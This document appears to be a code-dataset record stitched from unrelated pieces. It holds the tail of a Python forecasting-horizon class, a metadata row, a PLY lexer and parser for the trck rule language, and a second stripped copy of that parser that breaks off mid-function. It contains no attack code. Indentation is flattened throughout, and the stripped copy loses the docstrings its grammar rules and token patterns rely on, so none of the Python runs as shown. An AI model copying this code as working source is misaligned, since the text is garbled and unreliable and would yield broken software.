if is_relative is None:
if type(values) in RELATIVE_TYPES:
is_relative = True
elif type(values) in ABSOLUTE_TYPES:
is_relative = False
else:
raise TypeError(type(values) + "is not a supported fh index type")
if is_relative:
if not type(values) in RELATIVE_TYPES:
raise TypeError(error_msg)
else:
if not type(values) in ABSOLUTE_TYPES:
raise TypeError(error_msg)
self._values = values
self._is_relative = is_relative
def _new(self, values=None, is_relative=None):
if values is None:
values = self._values
if is_relative is None:
is_relative = self.is_relative
return type(self)(values, is_relative)
@property
def is_relative(self):
return self._is_relative
def to_pandas(self):
return self._values
def to_numpy(self, **kwargs):
return self.to_pandas().to_numpy(**kwargs)
# We cache the results from `to_relative()` and `to_absolute()` calls to speed up
# computations, as these are the basic methods and often required internally when
# calling different methods.
@lru_cache(typed=True)
def to_relative(self, cutoff=None):
if self.is_relative:
return self._new()
else:
absolute = self.to_pandas()
_check_cutoff(cutoff, absolute)
if isinstance(absolute, pd.DatetimeIndex):
# We cannot use the freq from the the ForecastingHorizon itself (or its
# wrapped pd.DatetimeIndex) because it may be none for non-regular
# indices, so instead we use the freq of cutoff.
freq = _get_freq(cutoff)
# coerce to pd.Period for reliable arithmetics and computations of
# time deltas
absolute = _coerce_to_period(absolute, freq)
cutoff = _coerce_to_period(cutoff, freq)
# Compute relative values
relative = absolute - cutoff
# Coerce durations (time deltas) into integer values for given frequency
if isinstance(absolute, (pd.PeriodIndex, pd.DatetimeIndex)):
relative = _coerce_duration_to_int(relative, freq=_get_freq(cutoff))
return self._new(relative, is_relative=True)
@lru_cache(typed=True)
def to_absolute(self, cutoff):
if not self.is_relative:
return self._new()
else:
relative = self.to_pandas()
_check_cutoff(cutoff, relative)
is_timestamp = isinstance(cutoff, pd.Timestamp)
if is_timestamp:
# coerce to pd.Period for reliable arithmetic operations and
# computations of time deltas
cutoff = _coerce_to_period(cutoff)
absolute = cutoff + relative
if is_timestamp:
# coerce back to DatetimeIndex after operation
freq = _get_freq(cutoff)
absolute = absolute.to_timestamp(freq)
return self._new(absolute, is_relative=False)
def to_absolute_int(self, start, cutoff=None):
# We here check the start value, the cutoff value is checked when we use it
# to convert the horizon to the absolute representation below
absolute = self.to_absolute(cutoff).to_pandas()
_check_start(start, absolute)
# Note: We should here also coerce to periods for more reliable arithmetic
# operations as in `to_relative` but currently doesn't work with
integers = absolute - start
if isinstance(absolute, (pd.PeriodIndex, pd.DatetimeIndex)):
integers = _coerce_duration_to_int(integers, freq=_get_freq(cutoff))
return self._new(integers, is_relative=False)
def to_in_sample(self, cutoff=None):
is_in_sample = self._is_in_sample(cutoff)
in_sample = self.to_pandas()[is_in_sample]
return self._new(in_sample)
def to_out_of_sample(self, cutoff=None):
is_out_of_sample = self._is_out_of_sample(cutoff)
out_of_sample = self.to_pandas()[is_out_of_sample]
return self._new(out_of_sample)
def _is_in_sample(self, cutoff=None):
return self.to_relative(cutoff).to_pandas() <= 0
def is_all_in_sample(self, cutoff=None):
return sum(self._is_in_sample(cutoff)) == len(self)
def _is_out_of_sample(self, cutoff=None):
return self.to_relative(cutoff).to_pandas() > 0
def is_all_out_of_sample(self, cutoff=None):
return sum(self._is_out_of_sample(cutoff)) == len(self)
def to_indexer(self, cutoff=None, from_cutoff=True):
if from_cutoff:
return self.to_relative(cutoff).to_pandas() - 1
else:
relative = self.to_relative(cutoff)
return relative - relative.to_pandas()[0]
def __repr__(self):
class_name = self.__class__.__name__
pandas_repr = repr(self.to_pandas()).split("(")[-1].strip(")")
return f"{class_name}({pandas_repr}, is_relative={self.is_relative})"
def _check_cutoff(cutoff, index):
if cutoff is None:
raise ValueError("`cutoff` must be given, but found none.")
if isinstance(index, pd.PeriodIndex):
assert isinstance(cutoff, pd.Period)
assert index.freqstr == cutoff.freqstr
if isinstance(index, pd.DatetimeIndex):
assert isinstance(cutoff, pd.Timestamp)
if not hasattr(cutoff, "freqstr") or cutoff.freqstr is None:
raise AttributeError(
"The `freq` attribute of the time index is required, "
"but found: None. Please specify the `freq` argument "
"when setting the time index."
)
if index.freqstr is not None:
assert cutoff.freqstr == index.freqstr
def _check_start(start, index):
if isinstance(index, pd.PeriodIndex):
assert isinstance(start, pd.Period)
assert index.freqstr == start.freqstr
if isinstance(index, pd.DatetimeIndex):
assert isinstance(start, pd.Timestamp)
def _coerce_to_period(x, freq=None):
if freq is None:
freq = _get_freq(x)
try:
return x.to_period(freq)
except (ValueError, AttributeError) as e:
msg = str(e)
if "Invalid frequency" in msg or "_period_dtype_code" in msg:
raise ValueError(
"Invalid frequency. Please select a frequency that can "
"be converted to a regular `pd.PeriodIndex`. For other "
"frequencies, basic arithmetic operation to compute "
"durations currently do not work reliably."
)
else:
raise
| true | true |
1c3c7bb344aae3a98a185fc2c2dd8d5249cc62d9 | 17,483 | py | Python | src/trparser.py | traildb/trck | 64304f00f352fc023ef092c6c5332dfd3963fda7 | [
"MIT"
] | 53 | 2017-03-21T02:59:31.000Z | 2021-07-26T10:05:00.000Z | src/trparser.py | traildb/trck | 64304f00f352fc023ef092c6c5332dfd3963fda7 | [
"MIT"
] | 16 | 2017-04-10T19:29:56.000Z | 2018-06-28T17:07:18.000Z | src/trparser.py | traildb/trck | 64304f00f352fc023ef092c6c5332dfd3963fda7 | [
"MIT"
] | 14 | 2017-03-21T18:03:21.000Z | 2019-02-08T11:51:21.000Z | from __future__ import print_function
import ply.lex as lex
from itertools import groupby
from datetime import datetime
import re
class ParseError(Exception):
def __init__(self, message, **kwargs):
super(Exception, self).__init__(message)
self.info = kwargs
reserved = set(['after', 'receive', 'yield', 'quit', 'window', 'repeat', 'in', 'foreach', 'to', 'merged', 'results',
'start_timestamp'])
tokens = [
'TIMEDELTA',
'TIMESTAMP', 'STRING', 'NUMBER',
'COMMA',
'WILDCARD', 'ARROW', 'EQ', 'LT', 'GT', 'LTE', 'GTE',
'SCALAR', 'HASH', 'SCALAR_RESULT', 'ARRAY', 'MULTISET', 'HLL',
'ID', 'WS', 'INDENT', 'NEWLINE', 'DEDENT', 'LBRACKET', 'RBRACKET',
'LPAREN', 'RPAREN'
] + [r.upper() for r in reserved]
type_names = {
'ID': 'identifier'
}
# Tokens
t_LT = r'<'
t_GT = r'>'
t_LTE = r'<='
t_GTE = r'>='
t_COMMA = r','
t_WILDCARD= r'\*'
t_ARROW = r'->'
t_EQ = r'='
t_LBRACKET = '\['
t_RBRACKET = '\]'
t_LPAREN = '\('
t_RPAREN = '\)'
#t_WS = r'[ \t]+'
def t_TIMEDELTA(t):
r'\d+(s|m|h|d)'
try:
t.value = int(t.value[:-1]), t.value[-1]
except ValueError:
print("Integer value too large %d", t.value)
t.value = 0
return t
def t_NUMBER(t):
r'\d+'
try:
t.value = int(t.value)
except ValueError:
print("Integer value too large %d", t.value)
t.value = 0
return t
def t_TIMESTAMP(t):
r'\'\d{4}-\d{2}-\d{2}\''
try:
t.value = int((datetime.strptime(t.value.strip("'"), '%Y-%m-%d') - datetime(1970, 1, 1)).total_seconds())
except ValueError:
print("Cannot parse datetime", t.value)
t.value = 0
return t
def t_ID(t):
r'[a-zA-Z_][a-zA-Z_0-9]*'
t.type = t.value.upper() if t.value in reserved else 'ID'
return t
def t_SCALAR(t):
r'%[a-zA-Z_][a-zA-Z_0-9]*'
return t
def t_HASH(t):
r'\#[a-zA-Z_][a-zA-Z_0-9]*'
return t
def t_MULTISET(t):
r'&[a-zA-Z_][a-zA-Z_0-9]*'
return t
def t_HLL(t):
r'\^[a-zA-Z_][a-zA-Z_0-9]*'
return t
def t_ARRAY(t):
r'@[a-zA-Z_][a-zA-Z_0-9]*'
return t
def t_SCALAR_RESULT(t):
r'\$[a-zA-Z_][a-zA-Z_0-9]*'
return t
def t_STRING(t):
r'("(\\"|[^"])*")|(\'(\\\'|[^\'])*\')'
t.value = t.value[1:-1]
return t
def t_comment(t):
r"[ ]*--[^\n]*"
pass
def t_ws(t):
r'[ ]+'
t.type = 'WS'
return t
def t_newline_escape(t):
r"\\\n"
pass
def t_newline(t):
r'\n'
t.lexer.lineno += t.value.count("\n")
t.type = 'NEWLINE'
t.value = ''
return t
#def t_indent(t):
# r'\n+[ \t]*'
# t.lexer.lineno += t.value.count("\n")
# t.type = 'INDENT'
# return t
def t_error(t):
if t.lineno == -1:
raise ParseError(message="Lexer error: unexpected EOF")
else:
raise ParseError(message="Lexer error at line %s position %s: invalid token %s" % (t.lineno, t.lexpos, t.value),
lineno=t.lineno,
lexpos=t.lexpos,
type=t.type,
value=t.value)
class IndentLexer:
def __init__(self, lexer):
self.lexer = lexer
self.gen = gen_dedents(gen_indents(skip_begin_newlines(lexer)))
def input(self, *args, **kwds):
self.lexer.input(*args, **kwds)
def token(self):
try:
return self.gen.next()
except StopIteration:
return None
def __iter__(self):
return gen_dedents(gen_indents(skip_begin_newlines(self.lexer)))
def indent_level(v):
spaces = v.replace("\t", " ").replace("\n", "")
return len(spaces)
def skip_begin_newlines(lexer):
program_started = False
for token in lexer:
if program_started:
yield token
else:
if token.type not in ('NEWLINE', 'WS'):
program_started = True
yield token
def gen_indents(lexer):
prev = None
line_started = False
for token in lexer:
#print token
if token.type not in ('NEWLINE', 'WS'):
if not line_started:
line_started = True
if prev :
yield _new_token('INDENT', token.lineno, value=prev.value)
yield token
prev = token
elif token.type == 'NEWLINE':
line_started = False
prev = token
elif token.type == 'WS':
prev = token
def gen_dedents(lexer):
stack = [0]
for token in lexer:
if token.type != 'INDENT':
yield token
else:
level = indent_level(token.value)
if level == stack[-1]:
yield _new_token('NEWLINE', token.lineno)
continue
elif level < stack[-1]:
while stack[-1] > level:
stack_level = stack.pop()
if stack_level > 0:
yield _new_token('DEDENT', token.lineno)
if stack[-1] != level:
raise ParseError("Indent level doesn't match earlier at %s: stack %s now %s" % (token.lineno, stack, level))
elif level > stack[-1]:
stack.append(level)
yield _new_token('INDENT', token.lineno)
while stack:
stack_level = stack.pop()
if stack_level > 0:
yield _new_token('DEDENT', -1)
def _new_token(type, lineno, value=None):
tok = lex.LexToken()
tok.type = type
tok.lineno = lineno
tok.value = value
tok.lexpos = -100
return tok
def timedelta_to_seconds(n, unit):
if unit == 's':
return n
elif unit == 'm':
return n * 60
elif unit == 'h':
return n * 60 * 60
elif unit == 'd':
return n * 60 * 60 * 24
else:
raise ParseError("unknown time unit: %s" % unit)
def p_program(p):
"""program : foreach_expr INDENT rules DEDENT
| rules"""
if len(p) > 2:
p[0] = {'rules' : p[3], 'groupby' : p[1]}
else:
p[0] = {'rules' : p[1]}
def p_foreach_expr(p):
""" foreach_expr : FOREACH vars IN ARRAY
| FOREACH vars IN ARRAY MERGED
| FOREACH vars IN ARRAY MERGED RESULTS """
p[0] = {'vars': p[2], 'values': p[4], "lineno": p.lineno(2)}
if len(p) > 5:
p[0]['merge_results'] = True
def p_foreach_expr_imp(p):
""" foreach_expr : FOREACH SCALAR
| FOREACH SCALAR MERGED
| FOREACH SCALAR MERGED RESULTS """
p[0] = {'vars': [p[2]], "lineno": p.lineno(2)}
if len(p) > 3:
p[0]['merge_results'] = True
def p_vars(p):
"""vars : vars COMMA var
| var """
if len(p) > 2:
p[0] = p[1] + [p[3]]
else:
p[0] = [p[1]]
def p_var(p):
""" var : HASH
| SCALAR
"""
p[0] = p[1]
def p_rules(p):
"""rules : rules rule
| rule """
if len(p) > 2:
p[0] = p[1] + [p[2]]
else:
p[0] = [p[1]]
def p_rule(p):
""" rule : ID ARROW INDENT rule_body DEDENT
"""
p[0] = {k : v for k, v in p[4].items() + [('name', p[1])]}
def p_rule_body(p):
""" rule_body : window_stmt
| receive_stmt
"""
p[0] = p[1]
def p_windowed_rule(p):
""" window_stmt : WINDOW INDENT rules DEDENT AFTER TIMEDELTA ARROW actions
"""
p[0] = {'rules' : p[3], 'after' : p[8], 'window' : timedelta_to_seconds(*p[6])}
def p_receive_rule(p):
""" receive_stmt : RECEIVE INDENT match_clauses DEDENT
"""
p[0] = {'clauses' : p[3]}
def p_receive_rule2(p):
""" receive_stmt : RECEIVE INDENT match_clauses DEDENT AFTER TIMEDELTA ARROW actions """
p[0] = {'clauses' : p[3], 'window' : timedelta_to_seconds(*p[6]), 'after' : p[8] }
def p_receive_rule3(p):
""" receive_stmt : RECEIVE INDENT match_clauses DEDENT AFTER ARROW actions """
p[0] = {'clauses' : p[3], 'after' : p[7] }
def p_match_clauses(p):
"""match_clauses : match_clauses NEWLINE match_clause
| match_clause """
if len(p) > 2:
p[0] = p[1] + [p[3]]
else:
p[0] = [p[1]]
def p_match_clause(p):
""" match_clause : conditions ARROW actions """
p[0] = {k:v for k, v in [("attrs", p[1]), ("lineno", p.lineno(2))] + p[3].items()}
def p_match_clause2(p):
""" match_clause : WILDCARD ARROW actions """
p[0] = {k:v for k, v in [("attrs", {}), ("lineno", p.lineno(2))] + p[3].items()}
# concatitems([[1],[2]]) -> [1,2]
# concatitems([1,[2]]) -> [1,2]
# concatitems([1]) -> [1]
def concatitems(items):
assert(items)
res = []
for k, v in items:
if isinstance(v, list):
res.extend(v)
else:
res.append(v)
return res
def p_conditions(p):
"""conditions : conditions COMMA condition
| condition """
if len(p) > 2:
p[0] = {k: concatitems(v) for k, v in groupby(sorted(p[1].items() + p[3].items()),
key=lambda x: x[0])}
else:
p[0] = p[1]
def p_condition(p):
""" condition : ID EQ STRING
| ID EQ SCALAR """
p[0] = {p[1]: [p[3]]}
def p_condition_hash(p):
""" condition : ID IN HASH"""
p[0] = {p[1]: [p[3]]}
def p_condition_ts(p):
""" condition : ID LT TIMESTAMP
| ID GT TIMESTAMP
| ID GTE TIMESTAMP
| ID LTE TIMESTAMP """
p[0] = {p[1]: [p[2] + str(p[3])]}
def p_condition_ts_2(p):
""" condition : ID LT NUMBER
| ID GT NUMBER
| ID GTE NUMBER
| ID LTE NUMBER """
p[0] = {p[1]: [p[2] + str(p[3])]}
def p_condition_ts_3(p):
""" condition : ID LT SCALAR
| ID GT SCALAR
| ID GTE SCALAR
| ID LTE SCALAR """
p[0] = {p[1]: [p[2] + str(p[3])]}
def p_actions(p):
""" actions : yields COMMA transition """
p[0] = {'yield' : p[1], 'action' : p[3]}
def p_actions_2(p):
""" actions : yields """
p[0] = {'yield' : p[1]}
def p_actions_3(p):
""" actions : transition """
p[0] = {'action' : p[1]}
def p_action_yields(p):
""" yields : yields COMMA YIELD yield_var
| YIELD yield_var """
if len(p) == 3:
p[0] = [p[2]]
else:
p[0] = p[1] + [p[4]]
def p_action_yield_var(p):
""" yield_var : SCALAR_RESULT
"""
p[0] = {'dst': p[1]}
def p_action_yield_set(p):
""" yield_var : ID TO HASH """
p[0] = {'dst': p[3], 'src': [{'_k': 'field', 'name': p[1]}]}
def p_action_yield_multiset(p):
""" yield_var : ID TO MULTISET """
p[0] = {'dst': p[3], 'src': [{'_k': 'field', 'name': p[1]}]}
def p_action_yield_hll(p):
""" yield_var : ID TO HLL """
p[0] = {'dst': p[3], 'src': [{'_k': 'field', 'name': p[1]}]}
def p_action_yield_set_tuple(p):
""" yield_var : ids TO HASH """
p[0] = {'dst': p[3], 'src': p[1]}
def p_action_yield_multiset_tuple(p):
""" yield_var : ids TO MULTISET """
p[0] = {'dst': p[3], 'src': p[1]}
def p_action_yield_hll_tuple(p):
""" yield_var : ids TO HLL """
p[0] = {'dst': p[3], 'src': p[1]}
def p_ids(p):
"""ids : ids COMMA yieldable
| yieldable """
if len(p) > 2:
p[0] = p[1] + [p[3]]
else:
p[0] = [p[1]]
def p_yieldable(p):
""" yieldable : ID """
p[0] = {'_k': 'field', 'name': p[1]}
def p_yieldable_start_ts(p):
""" yieldable : START_TIMESTAMP """
p[0] = {'_k': 'window_ref'}
def p_yieldable_fcall(p):
""" yieldable : fcall """
p[0] = p[1]
def p_yieldable_windowref(p):
""" yieldable : START_TIMESTAMP LBRACKET ID RBRACKET """
p[0] = {'_k': 'window_ref', 'ref': p[3]}
def p_fcall(p):
""" fcall : ID LPAREN arglist RPAREN """
p[0] = {'_k': 'fcall',
'name': p[1],
'args': p[3]}
def p_arglist(p):
""" arglist : arglist COMMA arg
| arg """
if len(p) == 2:
p[0] = [p[1]]
elif len(p) == 4:
p[0] = p[1] + [p[3]]
def p_arg_id(p):
""" arg : ID """
p[0] = {'_k': 'field', 'name': p[1]}
def p_arg_scalar(p):
""" arg : SCALAR """
p[0] = {'_k': 'param', 'name': p[1]}
def p_arg_fcall(p):
""" arg : fcall """
p[0] = p[1]
def p_arg_ts(p):
""" arg : START_TIMESTAMP LBRACKET ID RBRACKET """
p[0] = {'_k': 'window_ref', 'ref': p[3]}
def p_arg_literal(p):
""" arg : STRING
| NUMBER """
p[0] = {'_k': 'literal', 'value': p[1]}
def p_transition(p):
""" transition : ID """
p[0] = p[1]
def p_transition2(p):
""" transition : QUIT
| REPEAT"""
p[0] = p[1]
def p_error(p):
if p is None or p.lineno == -1:
raise ParseError(message="Syntax error: unexpected EOF")
else:
raise ParseError(message="Syntax error at line %s position %s: %s %s" % (p.lineno, p.lexpos, type_names.get(p.type, p.type), p.value),
lineno=p.lineno,
lexpos=p.lexpos,
type=p.type,
value=p.value)
# Convert a structure with nested window() statements to a flat list of rules
# Replace transitions with numeric labels. Use restart-from-next(%label)
# in rule matcher clauses, and restart-from-here(%label) in after actions.
def assign_numeric_labels(rules, n = 0):
for r in rules:
r['n'] = n
n += 1
if 'rules' in r:
n = assign_numeric_labels(r['rules'], n)
r['outer'] = n
return n
def flatten_rules(rules):
for r in rules:
nested = r.get('rules')
if nested:
del r['rules']
yield r
if nested:
for r in flatten_rules(nested):
yield r
reserved_actions = ['repeat', 'quit']
def convert_transitions(rules):
numeric = {r['name'] : r['n'] for r in rules}
for r in rules:
if 'after' in r:
if 'action' in r['after']:
action = r['after']['action']
if action not in reserved_actions:
r['after']['action'] = 'restart-from-here(%d)' % numeric[action]
else:
r['after']['action'] = 'restart-from-here'
for c in r.get('clauses', []):
if 'action' in c:
action = c['action']
if action not in reserved_actions:
if action not in numeric:
raise ParseError(message='Label not found: %s' % action, lineno=c.get('lineno'), lexpos=c.get('lexpos'))
c['action'] = 'restart-from-next(%d)' % numeric[action]
else:
if r['n'] >= 1:
raise ParseError(message='Consider adding repeat here', lineno=c.get('lineno'), lexpos=c.get('lexpos'))
else:
c['action'] = 'repeat'
import ply.yacc as yacc
parser = yacc.yacc()
# Build the lexer
lexer = lex.lex()
lexer = IndentLexer(lexer)
import sys
import json
EXPR_TYPE_CONST = 'const'
EXPR_TYPE_IN_VAR = 'in_var'
EXPR_TYPE_TIMESTAMP_OP_VAR = 'timestamp_op_var'
EXPR_TYPE_TIMESTAMP_OP_CONST = 'timestamp_op_const'
def is_variable(n):
if n == '':
return False
return n[0] in '#&%$@'
def parse_expr(expr_string):
m = re.match('((>=)|(<=)|(==)|(<)|(>))(.+)', expr_string)
if m:
if is_variable(m.group(7)):
return (EXPR_TYPE_TIMESTAMP_OP_VAR, (m.group(1), m.group(7)))
else:
return (EXPR_TYPE_TIMESTAMP_OP_CONST, (m.group(1), m.group(7)))
if is_variable(expr_string):
return (EXPR_TYPE_IN_VAR, (expr_string,))
else:
return (EXPR_TYPE_CONST, (expr_string,))
def get_var_fields(rules):
res = {}
for rule in rules:
for clause in rule.get('clauses', []):
for field, conditions in clause.get('attrs', {}).items():
for expr in conditions:
t, r = parse_expr(expr)
if t == EXPR_TYPE_IN_VAR:
res[r[0]] = field
elif t == EXPR_TYPE_TIMESTAMP_OP_VAR:
res[r[1]] = field
return res
def compile_tr(text):
lexer.input(text)
result = parser.parse(lexer = lexer)
assign_numeric_labels(result['rules'])
flat_rules = list(flatten_rules(result['rules']))
convert_transitions(flat_rules)
if 'groupby' in result:
return { 'rules' : flat_rules, 'groupby': result['groupby']}
else:
return {'rules' : flat_rules}
def syntax_check(text):
try:
parser = yacc.yacc()
# Build the lexer
lexer = lex.lex()
lexer = IndentLexer(lexer)
sys.stderr.write("text %s\n" % text)
lexer.input(text)
result = parser.parse(lexer=lexer)
assign_numeric_labels(result['rules'])
flat_rules = list(flatten_rules(result['rules']))
convert_transitions(flat_rules)
return []
except ParseError as e:
sys.stderr.write("exception %s %s\n" % (e.message, lexer.lexer.lineno))
return [{'message' : e.message, 'info' : e.info}]
if __name__ == '__main__':
if len(sys.argv) == 1:
flat_rules = compile_tr(sys.stdin.read())
print(json.dumps(flat_rules))
elif sys.argv[1] == 'lex':
lexer.input(sys.stdin.read())
for t in lexer:
print(t.lineno, t.type, t.value)
elif sys.argv[1] == 'gen':
pass
| 26.773354 | 142 | 0.517531 | from __future__ import print_function
import ply.lex as lex
from itertools import groupby
from datetime import datetime
import re
class ParseError(Exception):
def __init__(self, message, **kwargs):
super(Exception, self).__init__(message)
self.info = kwargs
reserved = set(['after', 'receive', 'yield', 'quit', 'window', 'repeat', 'in', 'foreach', 'to', 'merged', 'results',
'start_timestamp'])
tokens = [
'TIMEDELTA',
'TIMESTAMP', 'STRING', 'NUMBER',
'COMMA',
'WILDCARD', 'ARROW', 'EQ', 'LT', 'GT', 'LTE', 'GTE',
'SCALAR', 'HASH', 'SCALAR_RESULT', 'ARRAY', 'MULTISET', 'HLL',
'ID', 'WS', 'INDENT', 'NEWLINE', 'DEDENT', 'LBRACKET', 'RBRACKET',
'LPAREN', 'RPAREN'
] + [r.upper() for r in reserved]
type_names = {
'ID': 'identifier'
}
t_LT = r'<'
t_GT = r'>'
t_LTE = r'<='
t_GTE = r'>='
t_COMMA = r','
t_WILDCARD= r'\*'
t_ARROW = r'->'
t_EQ = r'='
t_LBRACKET = '\['
t_RBRACKET = '\]'
t_LPAREN = '\('
t_RPAREN = '\)'
def t_TIMEDELTA(t):
try:
t.value = int(t.value[:-1]), t.value[-1]
except ValueError:
print("Integer value too large %d", t.value)
t.value = 0
return t
def t_NUMBER(t):
try:
t.value = int(t.value)
except ValueError:
print("Integer value too large %d", t.value)
t.value = 0
return t
def t_TIMESTAMP(t):
try:
t.value = int((datetime.strptime(t.value.strip("'"), '%Y-%m-%d') - datetime(1970, 1, 1)).total_seconds())
except ValueError:
print("Cannot parse datetime", t.value)
t.value = 0
return t
def t_ID(t):
t.type = t.value.upper() if t.value in reserved else 'ID'
return t
def t_SCALAR(t):
return t
def t_HASH(t):
return t
def t_MULTISET(t):
return t
def t_HLL(t):
return t
def t_ARRAY(t):
return t
def t_SCALAR_RESULT(t):
return t
def t_STRING(t):
t.value = t.value[1:-1]
return t
def t_comment(t):
pass
def t_ws(t):
t.type = 'WS'
return t
def t_newline_escape(t):
pass
def t_newline(t):
t.lexer.lineno += t.value.count("\n")
t.type = 'NEWLINE'
t.value = ''
return t
#def t_indent(t):
# r'\n+[ \t]*'
# t.lexer.lineno += t.value.count("\n")
# t.type = 'INDENT'
# return t
def t_error(t):
if t.lineno == -1:
raise ParseError(message="Lexer error: unexpected EOF")
else:
raise ParseError(message="Lexer error at line %s position %s: invalid token %s" % (t.lineno, t.lexpos, t.value),
lineno=t.lineno,
lexpos=t.lexpos,
type=t.type,
value=t.value)
class IndentLexer:
def __init__(self, lexer):
self.lexer = lexer
self.gen = gen_dedents(gen_indents(skip_begin_newlines(lexer)))
def input(self, *args, **kwds):
self.lexer.input(*args, **kwds)
def token(self):
try:
return self.gen.next()
except StopIteration:
return None
def __iter__(self):
return gen_dedents(gen_indents(skip_begin_newlines(self.lexer)))
def indent_level(v):
spaces = v.replace("\t", " ").replace("\n", "")
return len(spaces)
def skip_begin_newlines(lexer):
program_started = False
for token in lexer:
if program_started:
yield token
else:
if token.type not in ('NEWLINE', 'WS'):
program_started = True
yield token
def gen_indents(lexer):
prev = None
line_started = False
for token in lexer:
#print token
if token.type not in ('NEWLINE', 'WS'):
if not line_started:
line_started = True
if prev :
yield _new_token('INDENT', token.lineno, value=prev.value)
yield token
prev = token
elif token.type == 'NEWLINE':
line_started = False
prev = token
elif token.type == 'WS':
prev = token
def gen_dedents(lexer):
stack = [0]
for token in lexer:
if token.type != 'INDENT':
yield token
else:
level = indent_level(token.value)
if level == stack[-1]:
yield _new_token('NEWLINE', token.lineno)
continue
elif level < stack[-1]:
while stack[-1] > level:
stack_level = stack.pop()
if stack_level > 0:
yield _new_token('DEDENT', token.lineno)
if stack[-1] != level:
raise ParseError("Indent level doesn't match earlier at %s: stack %s now %s" % (token.lineno, stack, level))
elif level > stack[-1]:
stack.append(level)
yield _new_token('INDENT', token.lineno)
while stack:
stack_level = stack.pop()
if stack_level > 0:
yield _new_token('DEDENT', -1)
def _new_token(type, lineno, value=None):
tok = lex.LexToken()
tok.type = type
tok.lineno = lineno
tok.value = value
tok.lexpos = -100
return tok
def timedelta_to_seconds(n, unit):
if unit == 's':
return n
elif unit == 'm':
return n * 60
elif unit == 'h':
return n * 60 * 60
elif unit == 'd':
return n * 60 * 60 * 24
else:
raise ParseError("unknown time unit: %s" % unit)
def p_program(p):
if len(p) > 2:
p[0] = {'rules' : p[3], 'groupby' : p[1]}
else:
p[0] = {'rules' : p[1]}
def p_foreach_expr(p):
p[0] = {'vars': p[2], 'values': p[4], "lineno": p.lineno(2)}
if len(p) > 5:
p[0]['merge_results'] = True
def p_foreach_expr_imp(p):
p[0] = {'vars': [p[2]], "lineno": p.lineno(2)}
if len(p) > 3:
p[0]['merge_results'] = True
def p_vars(p):
if len(p) > 2:
p[0] = p[1] + [p[3]]
else:
p[0] = [p[1]]
def p_var(p):
p[0] = p[1]
def p_rules(p):
if len(p) > 2:
p[0] = p[1] + [p[2]]
else:
p[0] = [p[1]]
def p_rule(p):
p[0] = {k : v for k, v in p[4].items() + [('name', p[1])]}
def p_rule_body(p):
p[0] = p[1]
def p_windowed_rule(p):
p[0] = {'rules' : p[3], 'after' : p[8], 'window' : timedelta_to_seconds(*p[6])}
def p_receive_rule(p):
p[0] = {'clauses' : p[3]}
def p_receive_rule2(p):
p[0] = {'clauses' : p[3], 'window' : timedelta_to_seconds(*p[6]), 'after' : p[8] }
def p_receive_rule3(p):
p[0] = {'clauses' : p[3], 'after' : p[7] }
def p_match_clauses(p):
if len(p) > 2:
p[0] = p[1] + [p[3]]
else:
p[0] = [p[1]]
def p_match_clause(p):
p[0] = {k:v for k, v in [("attrs", p[1]), ("lineno", p.lineno(2))] + p[3].items()}
def p_match_clause2(p):
p[0] = {k:v for k, v in [("attrs", {}), ("lineno", p.lineno(2))] + p[3].items()}
def concatitems(items):
assert(items)
res = []
for k, v in items:
if isinstance(v, list):
res.extend(v)
else:
res.append(v)
return res
def p_conditions(p):
if len(p) > 2:
p[0] = {k: concatitems(v) for k, v in groupby(sorted(p[1].items() + p[3].items()),
key=lambda x: x[0])}
else:
p[0] = p[1]
def p_condition(p):
p[0] = {p[1]: [p[3]]}
def p_condition_hash(p):
p[0] = {p[1]: [p[3]]}
def p_condition_ts(p):
p[0] = {p[1]: [p[2] + str(p[3])]}
def p_condition_ts_2(p):
p[0] = {p[1]: [p[2] + str(p[3])]}
def p_condition_ts_3(p):
p[0] = {p[1]: [p[2] + str(p[3])]}
def p_actions(p):
p[0] = {'yield' : p[1], 'action' : p[3]}
def p_actions_2(p):
p[0] = {'yield' : p[1]}
def p_actions_3(p):
p[0] = {'action' : p[1]}
def p_action_yields(p):
if len(p) == 3:
p[0] = [p[2]]
else:
p[0] = p[1] + [p[4]]
def p_action_yield_var(p):
p[0] = {'dst': p[1]}
def p_action_yield_set(p):
p[0] = {'dst': p[3], 'src': [{'_k': 'field', 'name': p[1]}]}
def p_action_yield_multiset(p):
p[0] = {'dst': p[3], 'src': [{'_k': 'field', 'name': p[1]}]}
def p_action_yield_hll(p):
p[0] = {'dst': p[3], 'src': [{'_k': 'field', 'name': p[1]}]}
def p_action_yield_set_tuple(p):
p[0] = {'dst': p[3], 'src': p[1]}
def p_action_yield_multiset_tuple(p):
p[0] = {'dst': p[3], 'src': p[1]}
def p_action_yield_hll_tuple(p):
p[0] = {'dst': p[3], 'src': p[1]}
def p_ids(p):
if len(p) > 2:
p[0] = p[1] + [p[3]]
else:
p[0] = [p[1]]
def p_yieldable(p):
p[0] = {'_k': 'field', 'name': p[1]}
def p_yieldable_start_ts(p):
p[0] = {'_k': 'window_ref'}
def p_yieldable_fcall(p):
p[0] = p[1]
def p_yieldable_windowref(p):
p[0] = {'_k': 'window_ref', 'ref': p[3]}
def p_fcall(p):
p[0] = {'_k': 'fcall',
'name': p[1],
'args': p[3]}
def p_arglist(p):
if len(p) == 2:
p[0] = [p[1]]
elif len(p) == 4:
p[0] = p[1] + [p[3]]
def p_arg_id(p):
p[0] = {'_k': 'field', 'name': p[1]}
def p_arg_scalar(p):
p[0] = {'_k': 'param', 'name': p[1]}
def p_arg_fcall(p):
p[0] = p[1]
def p_arg_ts(p):
p[0] = {'_k': 'window_ref', 'ref': p[3]}
def p_arg_literal(p):
p[0] = {'_k': 'literal', 'value': p[1]}
def p_transition(p):
p[0] = p[1]
def p_transition2(p):
p[0] = p[1]
def p_error(p):
if p is None or p.lineno == -1:
raise ParseError(message="Syntax error: unexpected EOF")
else:
raise ParseError(message="Syntax error at line %s position %s: %s %s" % (p.lineno, p.lexpos, type_names.get(p.type, p.type), p.value),
lineno=p.lineno,
lexpos=p.lexpos,
type=p.type,
value=p.value)
def assign_numeric_labels(rules, n = 0):
for r in rules:
r['n'] = n
n += 1
if 'rules' in r:
n = assign_numeric_labels(r['rules'], n)
r['outer'] = n
return n
def flatten_rules(rules):
for r in rules:
nested = r.get('rules')
if nested:
del r['rules']
yield r
if nested:
for r in flatten_rules(nested):
yield r
reserved_actions = ['repeat', 'quit']
def convert_transitions(rules):
numeric = {r['name'] : r['n'] for r in rules}
for r in rules:
if 'after' in r:
if 'action' in r['after']:
action = r['after']['action']
if action not in reserved_actions:
r['after']['action'] = 'restart-from-here(%d)' % numeric[action]
else:
r['after']['action'] = 'restart-from-here'
